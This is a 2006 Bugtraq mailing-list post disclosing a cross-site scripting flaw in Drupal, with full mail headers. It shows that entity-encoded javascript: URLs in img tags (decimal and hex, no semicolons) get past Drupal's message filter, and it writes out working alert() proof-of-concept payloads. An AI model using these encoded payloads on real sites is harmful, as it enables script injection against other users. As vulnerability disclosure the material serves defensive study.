Return-Path:
 <bugtraq-return-22648-piotr=mallorn.ii.uj.edu.pl@securityfocus.com>
X-Original-To: piotr@mallorn.ii.uj.edu.pl
Delivered-To: piotr@mallorn.ii.uj.edu.pl
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com
	[205.206.231.27])
	by mallorn.ii.uj.edu.pl (Postfix) with ESMTP id 081E81E75
	for <piotr@mallorn.ii.uj.edu.pl>; Tue,  3 Jan 2006 21:03:16 +0100 (CET)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
	via smtpd (for mallorn.ii.uj.edu.pl [149.156.65.90]) with ESMTP;
	Tue, 3 Jan 2006 12:03:16 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com
	[205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP
	id D117B23A2F1; Tue,  3 Jan 2006 11:15:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27340 invoked from network); 2 Jan 2006 04:18:34 -0000
Date: 2 Jan 2006 10:45:25 -0000
Message-ID: <20060102104525.7170.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com
Subject: Drupal all versiyon xss cehennem.org

Drupal all versiyon xss 
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Decimal Value: HTML (without semicolons) 

<img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable 

post mesage  :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable  

  
---------------------------------------------------------

Credit:Liz0ziM
mail:liz0@bsdmail.com
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------